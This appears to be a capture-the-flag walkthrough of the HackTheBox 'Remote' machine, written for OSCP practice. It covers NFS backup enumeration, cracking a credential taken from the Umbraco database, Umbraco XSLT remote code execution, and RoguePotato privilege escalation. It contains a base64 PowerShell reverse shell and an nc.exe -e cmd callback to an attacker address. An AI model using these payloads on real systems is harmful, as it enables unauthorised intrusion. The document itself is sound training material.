Remote | HackTheBox | Walthrough | OSCP Preparation

Remote | HackTheBox | Walthrough | OSCP Preparation | by SilentExploit - Freedium Milestone: 20GB Reached We’ve reached 20GB of stored data — thank you for helping us grow! Patreon Ko-fi Liberapay Close < Go to the original Remote | HackTheBox | Walthrough | OSCP Preparation Start off by setting our target machine's IP as an environment variable ($target): this saves us having to constantly input the IP. SilentExploit Follow ~9 min read · April 8, 2026 (Updated: April 9, 2026) · Free: Yes ┌──(venv)─(root㉿user)-[/tmp] └─# export target=10.129.15.208 ┌──(venv)─(root㉿user)-[/tmp] └─# ping $target PING 10.129.15.208 (10.129.15.208) 56(84) bytes of data. 64 bytes from 10.129.15.208: icmp_seq=1 ttl=127 time=162 ms 64 bytes from 10.129.15.208: icmp_seq=2 ttl=127 time=117 ms Then, we perform a nmap scan of the target: ┌──(root㉿user)-[/run/…/user/2024/HTBox/remote] └─# nmap -p- -Pn $target -v -T5 --min-rate 1500 --max-rtt-timeout 500ms --max-retries 3 --open -oN nmap.txt && nmap -Pn $target -sVC -v && nmap $target -v --script-vuln -T4 PORT STATE SERVICE VERSION 21/tcp open ftp Microsoft ftpd | ftp-syst: |_ SYST: Windows_NT |_ftp-anon: Anonymous FTP login allowed (FTP code 230) 80/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS |_http-title: Home - Acme Widgets 111/tcp open rpcbind 2-4 (RPC #100000) | rpcinfo: | program version port/proto service | 100000 2,3,4 111/tcp rpcbind | 100000 2,3,4 111/tcp6 rpcbind | 100000 2,3,4 111/udp rpcbind | 100000 2,3,4 111/udp6 rpcbind | 100003 2,3 2049/udp nfs | 100003 2,3 2049/udp6 nfs | 100003 2,3,4 2049/tcp nfs | 100003 2,3,4 2049/tcp6 nfs | 100005 1,2,3 2049/tcp mountd | 100005 1,2,3 2049/tcp6 mountd | 100005 1,2,3 2049/udp mountd | 100005 1,2,3 2049/udp6 mountd | 100021 1,2,3,4 2049/tcp nlockmgr | 100021 1,2,3,4 2049/tcp6 nlockmgr | 100021 1,2,3,4 2049/udp nlockmgr | 100021 1,2,3,4 2049/udp6 nlockmgr | 100024 1 2049/tcp status | 100024 1 2049/tcp6 status | 100024 1 2049/udp status |_ 100024 1 2049/udp6 status 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds? 2049/tcp open nlockmgr 1-4 (RPC #100021) 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-title: Not Found |_http-server-header: Microsoft-HTTPAPI/2.0 Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows The above output is highly snipped / consolidated. Your output will be much larger than this. Two things that instantly catch your attention should be: -anonymous FTP login / access on port 21 - NFS share mounts at port 2049 / 111 The FTP share was empty so I moved straight onto mounting the NFS shares: ┌──(root㉿user)-[/run/…/user/2024/HTBox/remote] └─# showmount -e $target Export list for 10.129.230.172: /site_backups (everyone We can see from the above output we have a share mount on the target called site_backups I am going to make a new directory called NFS on my kali machine and mount the contents of site_backups: ┌──(root㉿user)-[/run/…/user/2024/HTBox/remote] └─# mkdir NFS ┌──(root㉿user)-[/run/…/user/2024/HTBox/remote] └─# mount -t nfs $target:/ ./NFS/ -o nolock ┌──(root㉿user)-[/run/…/user/2024/HTBox/remote] └─# cd NFS ┌──(root㉿user)-[/run/…/2024/HTBox/remote/NFS] └─# ls site_backups This folder basically contains a back up of the site we find at port 80. Whilst trawling through you can note some interesting information pertaining to the architecture of the site: it uses Umbraco. Umbraco is an open-source, flexible Content Management System (CMS) built on Microsoft .NET technology). I have a bash command that I run in my terminal to look for any references to potential credentials; this can get messy and often flags irrelevant material (we will get to this below). ┌──(root㉿user)-[/run/…/HTBox/remote/NFS/site_backups] └─# grep -rIE "password|pwd|connectionstring|user id|token" . ./App_Data/Logs/UmbracoTraceLog.intranet.txt: 2020-02-20 00:58:20,012 [P3592/D3/T25] WARN Umbraco.Web.Editors.PasswordChanger - Could not change user password Passwords must be at least 10 characters. ./App_Data/Logs/UmbracoTraceLog.intranet.txt.2020-02-19:[passwordConfig] NVARCHAR(500) NULL, ^C I noted we had this log UmbracoTraceLog.intranet.txt so I began manually inspecting it. If you note in the above log we have 'Login attempt failed for username Umbracoadmin123!!' ; this is obviously a password. I noted this as a potential credentials for [email protected]. I also noted there was an additional username listed (line 221); ssmith . At this point I used ffuf to enumerate sub directories and find the login page for Umbraco. ┌──(root㉿user)-[/run/…/user/2024/HTBox/remote] └─# ffuf -w /usr/share/seclists/Discovery/Web-Content/raft-small-directories.txt -u http://$target/FUZZ --recursion-depth=1 /'___\ /'___\ /'___\ /\ \__/ /\ \__/ __ __ /\ \__/ \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\ \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/ \ \_\ \ \_\ \ \____/ \ \_\ \/_/ \/_/ \/___/ \/_/ v2.1.0-dev ________________________________________________ :: Method : GET :: URL : http://10.129.230.172/FUZZ :: Wordlist : FUZZ: /usr/share/seclists/Discovery/Web-Content/raft-small-directories.txt :: Follow redirects : false :: Calibration : false :: Timeout : 10 :: Threads : 40 :: Matcher : Response status: 200-299,301,302,307,401,403,405,500 ________________________________________________ contact [Status: 200, Size: 7880, Words: 828, Lines: 125, Duration: 658ms] install [Status: 302, Size: 126, Words: 6, Lines: 4, Duration: 578ms] blog [Status: 200, Size: 5001, Words: 1249, Lines: 138, Duration: 1691ms] home [Status: 200, Size: 6703, Words: 1807, Lines: 188, Duration: 982ms] products [Status: 200, Size: 5338, Words: 1307, Lines: 130, Duration: 197ms] product [Status: 500, Size: 3420, Words: 774, Lines: 81, Duration: 1515ms] intranet [Status: 200, Size: 3313, Words: 683, Lines: 117, Duration: 792ms] Install [Status: 302, Size: 126, Words: 6, Lines: 4, Duration: 737ms] Home [Status: 200, Size: 6703, Words: 1807, Lines: 188, Duration: 351ms] about-us [Status: 200, Size: 5451, Words: 1232, Lines: 162, Duration: 695ms] people [Status: 200, Size: 6749, Words: 2109, Lines: 168, Duration: 1347ms] umbraco [Status: 200, Size: 4040, Words: 710, Lines: 96, Duration: 520ms] Products [Status: 200, Size: 5338, Words: 1307, Lines: 130, Duration: 212ms] Blog [Status: 200, Size: 5011, Words: 1249, Lines: 138, Duration: 335ms] master [Status: 500, Size: 3420, Words: 774, Lines: 81, Duration: 290ms] Product [Status: 500, Size: 3420, Words: 774, Lines: 81, Duration: 208ms] Contact [Status: 200, Size: 7880, Words: 828, Lines: 125, Duration: 275ms] INSTALL [Status: 302, Size: 126, Words: 6, Lines: 4, Duration: 491ms] person [Status: 200, Size: 2741, Words: 503, Lines: 82, Duration: 2876ms] Master [Status: 500, Size: 3420, Words: 774, Lines: 81, Duration: 256ms] Intranet [Status: 200, Size: 3313, Words: 683, Lines: 117, Duration: 128ms] People [Status: 200, Size: 6739, Words: 2109, Lines: 168, Duration: 280ms] Person [Status: 200, Size: 2741, Words: 503, Lines: 82, Duration: 407ms] [Status: 200, Size: 6693, Words: 1807, Lines: 188, Duration: 295ms] HOME [Status: 200, Size: 6703, Words: 1807, Lines: 188, Duration: 271ms] I manually trawled through the directories to see whether we could land on a login page and found http://10.129.230.172/install > redirects us to the login page http://10.129.230.172/umbraco/#/login I was initially hopeful that the credentials for ssmith or admin would work to authenticate but they did not. I tried many variations i.e appending the email htb.local but this was to no avail. As we have the site_backup we needed to go back and enumerate HARDER ; my grep command I used earlier was just a basic guide and you can't expect it to find all the credentials automatically. There was a file called Umbraco.sdf : in Umbraco, a .sdf file is a database file used by Microsoft SQL Server Compact Edition (SQLCE). It acts as a lightweight, "portable" database that stores all the content, media references, and configuration settings. I ran the file through strings and saved the output to /tmp/strings which I then examined: This output can be somewhat intimidating. I manually went through and checked the hashes against crackstation (I would use hashcat if stuck) but we had a successful hit with the admin hash. [email protected] baconandcheese If we test this login against the Umbraco login page (discovered above) then we should have a successful login. Important note : my lab actually broke at this point. When I used the aforementioned (correct) login the page would just load blankly. I had this happen in the CWES exam by HackTheBox and it very nearly cost me the exam so remember: if the box is behaving oddly (not rejecting the credential but just pausing or the page is coming back empty) then RESET THE BOX. Once logged into the Umbraco dashboard; we can see that the version is 7.12.4. Version pictured in the top left corner It was rather easy to find this exploit ; it uses the XSLT Visualizer — a developer tool in the Umbraco backoffice — to execute arbitrary C# code. I had some trouble getting the dependencies to run this script (particularly beautifulsoup) to run coherently; the solution was to search on Github. I found a bash script that we could use to obtain our initial shell — below is the command log showing how to make the script executable in Linux (using chmod) then an example on how to use it correctly: ┌──(venv)─(root㉿user)-[/tmp] └─# chmod +x Umbrac-CMS-XSLT-RCE ┌──(venv)─(root㉿user)-[/tmp] └─# ./Umbrac-CMS-XSLT-RCE [email protected] baconandcheese http://10.129.15.208/ "whoami" [*] Checking and installing required dependencies... [*] Step 1 - Logging in... [+] Login successful! [*] Step 2 - Accessing XSLT Visualize page... [+] Successfully fetched tokens. [*] Step 3 - Sending malicious payload... [+] Payload executed successfully. Command Output: iis apppool\defaultapppool [*] Exploit completed. We can see that we get successful feedback as the user iis apppool when we execute the command 'whoami'. As is often the case with easy boxes on HTB; I refer to revshells to replace this command with a base64 encoded powershell reverse shell command. ┌──(venv)─(root㉿user)-[/tmp] └─# ./Umbrac-CMS-XSLT-RCE [email protected] baconandcheese http://10.129.15.208/ "powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA1AC4AOQAzACIALAA0ADQANAA0ACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA==" [*] Checking and installing required dependencies... [*] Step 1 - Logging in... [+] Login successful! [*] Step 2 - Accessing XSLT Visualize page... [+] Successfully fetched tokens. [*] Step 3 - Sending malicious payload... ┌──(root㉿user)-[/home/user] └─# rlwrap nc -lvnp 4444 listening on [any] 4444 ... connect to [10.10.15.93] from (UNKNOWN) [10.129.15.208] 49697 whoami iis apppool\defaultapppool Privilege Escalation I always start off by checking what privileges the user has on the machine and we can see we have the powerful SeImpersonatePrivilege PS C:\windows\system32\inetsrv> whoami /priv PRIVILEGES INFORMATION ---------------------- Privilege Name Description State ============================= ========================================= ======== SeAssignPrimaryTokenPrivilege Replace a process level token Disabled SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled SeAuditPrivilege Generate security audits Disabled SeChangeNotifyPrivilege Bypass traverse checking Enabled SeImpersonatePrivilege Impersonate a client after authentication Enabled SeCreateGlobalPrivilege Create global objects Enabled SeIncreaseWorkingSetPrivilege Increase a process working set Disabled If you ever land on a Windows box with SeImpersonatePrivileg e you should think instantly of Potato attacks. We run systeminfo to confirm our version of Windows: C:\Users\Public\Desktop>systeminfo systeminfo Host Name: REMOTE OS Name: Microsoft Windows Server 2019 Standard OS Version: 10.0.17763 N/A Build 17763 Here is a link to show which Potato attacks to use / which Windows versions each is best set to ; RoguePotato will be our choice due to our target being Microsoft Windows Server 2019 Standard. RoguePotato is a privilege escalation tool that tricks a high-privileged system service into authenticating against a fake "resolver" controlled / hosted by the us. By intercepting this connection, the tool captures a SYSTEM token and uses SeImpersonatePrivilege to launch a new process with administrative rights. Firstly, we need to transfer Roguepotato.exe to the victim machine ┌──(root㉿user)-[/run/…/HTBox/tools/Win-Potato/RoguePotato] └─# ls RogueOxidResolver.exe RoguePotato.exe ( I won't demonstrate this as file transfers can be done in many different ways — the CPTS has an extensive module on transfers ) Secondly, we run a socat command on kali; setting up a "relay" or a "bridge"; make sure to run this in the same directory as Rogueoxidresolver.exe . ┌──(root㉿user)-[/run/…/2024/HTBox/Tools/Win-Potato/RoguePotato] └─# socat tcp-listen:135,reuseaddr,fork tcp:10.129.15.208:9999 2026/04/08 14:06:26 socat[1119408] E read(5, 0x55f473dc3000, 8192): Connection reset by peer 2026/04/08 14:06:26 socat[1119399] E read(5, 0x55f473dc3000, 8192): Connection reset by peer Thirdly, transfer a copy of netcat (nc.exe) onto the target from kali. Make sure you work from directory where the user can write on the target (C:\windows\temp or the user's /desktop are usually good options). As soon as you run the command below; on Windows, the SYSTEM service will hit your Kali port 135, socat will forward it back to the Windows port 9999, RoguePotato will catch it, and you'll get your shell on your port — 443 in this case. ┌──(venv)─(root㉿user)-[/tmp] └─# rlwrap nc -lvnp 443 listening on [any] 443 ... .\RoguePotato.exe -r -e "C:\windows\temp\nc.exe 443 -e cmd" -l 9999 You should now have a shell as the root user …. thanks for reading #bug-bounty #hacking #ethical-hacking #tech #technology Reporting a Problem Sometimes we have problems displaying some Medium posts. If you have a problem that some images aren't loading - try using VPN. Probably you have problem with access to Medium CDN (or fucking Cloudflare's bot detection algorithms are blocking you).